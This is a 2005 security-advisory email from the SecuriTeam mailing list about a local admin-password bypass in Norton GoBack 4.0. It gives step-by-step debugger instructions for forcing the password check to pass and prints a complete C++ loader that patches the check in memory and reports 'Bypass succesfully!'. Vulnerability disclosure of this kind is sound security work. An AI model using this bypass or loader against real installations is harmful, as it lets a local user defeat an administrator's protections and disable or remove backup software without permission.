[NT] Norton GoBack Local Authentication Bypass

From: SecuriTeam (support_at_securiteam.com)
Date: 08/01/05

  • Next message: SecuriTeam: "[NT] BusinessMail Email Server System DoS"
    To: list@securiteam.com
    Date: 1 Aug 2005 18:49:13 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Norton GoBack Local Authentication Bypass
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.symantec.com/goback/> Norton GoBack has "the ability to
    backup and restore changes made in your partitions. Whenever a mistake is
    done, such as caused by a virus infection, you can use the program to
    reset the partition to its original state".

    A vulnerability recently discovered in Norton GoBack allows local users to
    to bypass authentication password used to limit the usage of the product
    by unauthorized users.

    DETAILS

    Vulnerable Systems:
     * Norton GoBack version 4.0

    Norton GoBack has an authenticate mechanism to protect itself. The
    following steps allows setting all authentication control rules to "none".

    1. Run OllyDbg, open file GBOption.exe in "%Program Files%\Norton GoBack".
    This is the program that Norton Goback use to change setting.

    2. Run program in OllyDbg by pressing F9. A windows with title "Norton
    GoBack Options" appears. Choose 2nd tab, click "Change Level...". It will
    show a window to change level for each action: enable/disable, uninstall,
    autobackup... There are three level: ADMIN, USER and NONE. By default, the
    level for uninstall is ADMIN, mean that you must have administrator pass
    to uninstall it. After changing level for these action to NONE and click
    OK, it requires ADMIN pass to authenticate (eventually, when you've set
    pass before). But here we don't have it now (lost, forget.. :D), so we
    will bypass it.

    3. Return to OllyDbg, jump to address 0x0043697D by pressing Ctrl+G, enter
    address in it & click OK. OllyDbg will change to this address, you can see
    these code:

    00436970 > 8B0D A8964700 MOV ECX,DWORD PTR DS:[4796A8]
    00436976 . 50 PUSH EAX
    00436977 . 51 PUSH ECX
    00436978 . E8 93E9FFFF CALL GBOption.00435310
    0043697D . 83C4 08 ADD ESP,8
    00436980 . 85C0 TEST EAX,EAX ; eax == 0 if pwd is correct!
    00436982 . 0F954424 0F SETNE BYTE PTR SS:[ESP+F]

    Notes in addr 0x00436978, this is the function that GoBack uses to check
    administrator pass. It will return true if password correct or false if
    password is incorrect (eventually). Because we don't have password, this
    function will certainly return false. So we will set breakpoint in address
    0x0043697D to change its return value: make sure the pointer is at
    0x0043697D, press F2 to set breakpoint (the line will change to red).

    4. Enter any pass you want & bypass Return to Norton GoBack Options, click
    OK, it will ask the ADMIN pass, you enter anything you want & press OK.
    Now, the control is changed to OllyDgb, it run to address where I set
    breakpoint and paused. Look in the registers window of OllyDbg, you'll see
    EAX = 0x00000090. Double click to it, change EAX to 0x00000000 and press
    F9 to continue. Now you'll see that no warning message were poped. All
    settings you made have been saved. You can check it again by click in
    "Change Level.." to see the result.

    5. Last action Now, after changing all action level to NONE, you can do
    anything with Norton GoBack without worry about asking ADMIN pass. You can
    enable/disable it, uninstall it... Good luck!

    Automatic loader:
    /*
     * AUTHOR: LightPhoenix
     * EMAIL: light.phoenix@gmail.com
     * DATE: 07/20/2005
     *
     * DESCRIPTION:
     * This loader is used in bypassing admin password
     * of Norton GoBack 4.0
     *
     * TODO:
     * Patch in memory at @0x436980
     * Origin: 0x85,0xC0,0x0F,0x95,0x44,0x24,0x0F
     * Patch: 0x33,0xC0,0xC6,0x44,0x24,0x0F,0x00
     */

    // Goback Loader.cpp
    #include <windows.h>

    LPTSTR strExecFile = TEXT("GBOptions.exe");

    int APIENTRY WinMain(HINSTANCE hInstance,
                         HINSTANCE hPrevInstance,
                         LPTSTR lpCmdLine,
                         int nCmdShow)
    {
      HANDLE hFile;
      STARTUPINFO si;
      PROCESS_INFORMATION pi;
      ZeroMemory(&si, sizeof(si));
      ZeroMemory(&pi, sizeof(pi));

      //Find GBOptions.exe
      if( (hFile = CreateFile(strExecFile, 0, FILE_SHARE_READ, NULL,
    OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL, NULL) ) == INVALID_HANDLE_VALUE)
      {
        MessageBox(0, "GBOptions.exe does not exist", "Bypass Norton GoBack
    4.0 by LightPhoenix[light.phoenix@gmail.com]", MB_ICONERROR);
        return -1;
      }
      CloseHandle(hFile);
      
      //createprocess with suspend
      if( CreateProcess(NULL, strExecFile, NULL, NULL, FALSE,
        CREATE_SUSPENDED, NULL, NULL, &si, &pi) == FALSE)
      {
        MessageBox(0, "Error executing GBOptions.exe", "Bypass Norton GoBack
    4.0 by LightPhoenix[light.phoenix@gmail.com]", MB_ICONERROR);
        return -1;
      }
      //patching
      BYTE buf[10];
      DWORD bytesRead, bytesWritten;
      ReadProcessMemory(pi.hProcess, (LPVOID)0x436980, buf, 7, &bytesRead);
      
      //Compare origin bytes
      if( buf[0] == 0x85 && buf[1] == 0xC0 && buf[2] == 0x0F && buf[3] == 0x95
    &&
        buf[4] == 0x44 && buf[5] == 0x24 && buf[6] == 0x0F )
      {
        //Correct!
        BYTE newData[] = {0x33, 0xC0, 0xC6, 0x44, 0x24, 0x0F, 0x00};
        WriteProcessMemory(pi.hProcess, (LPVOID)0x436980, newData,
    sizeof(newData) /sizeof(newData[0]), &bytesWritten);

        //resume
        ResumeThread(pi.hThread);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
        MessageBox(0, "Bypass succesfully!", "Bypass Norton GoBack 4.0 by
    LightPhoenix[light.phoenix@gmail.com]", MB_ICONINFORMATION);
      }
      else
      {
        //Failed
        MessageBox(0, "Wrong size???\nWrong version!", "Bypass Norton GoBack
    4.0 by LightPhoenix[light.phoenix@gmail.com]", MB_ICONERROR);
        TerminateProcess(pi.hProcess, 0);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
      }
      return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:light.phoenix@gmail.com>
    LightPhoenix.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] BusinessMail Email Server System DoS"